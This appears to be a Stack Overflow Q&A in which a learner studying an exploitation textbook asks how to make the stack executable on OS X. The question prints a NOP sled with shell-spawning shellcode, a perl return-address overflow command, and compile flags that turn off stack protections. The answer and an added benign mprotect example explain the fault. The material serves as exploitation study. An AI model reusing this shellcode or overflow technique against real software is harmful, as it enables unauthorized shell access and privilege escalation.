How do I make the stack executable on OS X?

car*_*ter 2 c security macos gcc shellcode

I'm currently working through "Hacking: The Art of Exploitation" and practising writing shellcode to inject into some sample code I wrote.

I'm injecting the shellcode via an environment variable. In lldb I can see that I'm overwriting the return address and that EIP is set to the middle of my NOP sled. However, it throws "EXC_BAD_ACCESS" and segfaults.

Here is the section of the stack holding my shellcode:

0xbffffbd8: "SHELL=/bin/sh"
0xbffffbe6: "SHELLCODE=\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xfffff
f90\xffffff90\xffffff901\xffffffc01\xffffffdb1\xffffffc9\xffffff99\xffffffb0\xffffffa4\xffffffcd\xffffff80j\vXQh//shh/bin\xffffff89\xffffffe3Q\xffffff89\xffffffe2S\xffffff89\xffffffe1\xffffffcd\xffffff80"
0xbffffcdc: "SHLVL=4"

Running lldb ./notesearch $(perl -e 'print "\x5e\xfc\xff\xbf"x40') to trigger the buffer overflow, this is what we get when it segfaults:

Process 21713 stopped
* thread #1: tid = 0xa33bc3, 0xbffffc5e, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0xbffffc5e)
    frame #0: 0xbffffc5e
->  0xbffffc5e: nop    
    0xbffffc5f: nop    
    0xbffffc60: nop    
    0xbffffc61: nop    

I'm compiling the code with gcc -g -O0 -fno-stack-protector -D_FORTIFY_SOURCE=0 -fomit-frame-pointer, and I'm using the change_mach_o_flags.py script with the --no-pie and --executable-heap options set.

I think the problem is that OS X automatically makes the stack non-executable. Unfortunately, gcc on OS X doesn't seem to have the -z execstack option. There is also no execstack utility to use.

I've searched the web and can't find any way at all to make the stack executable in my compiled code. Is there a way to do this, and if so, how?

use*_*242 5

From the Apple developer documentation:

There are two ways to make the stack and heap executable:

Pass the -allow_stack_execute flag to the compiler. This makes the stack (but not the heap) executable.

Use the mprotect system call to mark specific memory pages as executable. The details are beyond the scope of this document. See the mprotect manual page for more information.

See more: https://developer.apple.com/library/content/documentation/Security/Conceptual/SecureCodingGuide/Articles/BufferOverflows.html
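The EXC_BAD_ACCESS with code=2 at a stack address in the question is exactly what a non-executable stack produces: the return address was redirected correctly, but instruction fetch from that page is refused. The first route in the quoted answer, -allow_stack_execute, is an ld64 option and reaches the linker through the driver as -Wl,-allow_stack_execute. The second route, mprotect, is shown below as an added example that is not code from the question, the answer or Apple's documentation. It maps a page read/write, copies in a tiny stub (constructed for this example: "mov eax, 42; ret" on x86, "mov w0, #42; ret" on arm64), flips the page to read/execute with mprotect(), and calls it. The page is never writable and executable at the same time, which is the W^X discipline that defenders expect from any code that needs executable memory. It assumes a plain POSIX mmap/mprotect environment (x86 or i386 macOS, or Linux); on Apple silicon with the hardened runtime, executable mappings need MAP_JIT and the corresponding entitlement, which this example does not cover.

```c
/* Added example: create executable memory the W^X way with mprotect().
 * Not code from the question or answer. The stub bytes and the return
 * value 42 are constructed for this demonstration. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON   /* older macOS headers spell it MAP_ANON */
#endif

#if defined(__x86_64__) || defined(__i386__)
/* mov eax, 42 ; ret */
static const unsigned char kStub[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };
#elif defined(__aarch64__)
/* mov w0, #42 ; ret  (little-endian instruction encodings) */
static const unsigned char kStub[] = { 0x40, 0x05, 0x80, 0x52,
                                       0xC0, 0x03, 0x5F, 0xD6 };
#else
#error "no stub encoded for this architecture"
#endif

typedef int (*stub_fn)(void);

/* Returns the stub's result (42) on success, or -1 if any step fails. */
int run_stub_from_exec_page(void) {
    long pagesize = sysconf(_SC_PAGESIZE);
    if (pagesize <= 0) return -1;
    size_t len = (size_t)pagesize;

    /* 1. Map one page writable but NOT executable. */
    void *page = mmap(NULL, len, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) return -1;

    memcpy(page, kStub, sizeof kStub);

    /* 2. Drop write and add execute in one step: the page is never RWX. */
    if (mprotect(page, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(page, len);
        return -1;
    }
    /* arm64 has split instruction/data caches; make the new bytes visible
     * to instruction fetch. A no-op on x86, harmless everywhere. */
    __builtin___clear_cache((char *)page, (char *)page + sizeof kStub);

    /* 3. Call it (data-to-function pointer cast via uintptr_t). */
    stub_fn fn = (stub_fn)(uintptr_t)page;
    int result = fn();

    munmap(page, len);
    return result;
}

int main(void) {
    return run_stub_from_exec_page() == 42 ? 0 : 1;
}
```

Compile with cc -O0 example.c && ./a.out; exit status 0 means the stub ran from the mprotect'ed page. If you instead skip the mprotect() call and invoke fn() on the still read/write page, you get the same EXC_BAD_ACCESS (code=2) the question shows, which is the quickest way to confirm that the fault in lldb is an execute-permission failure rather than a bad address.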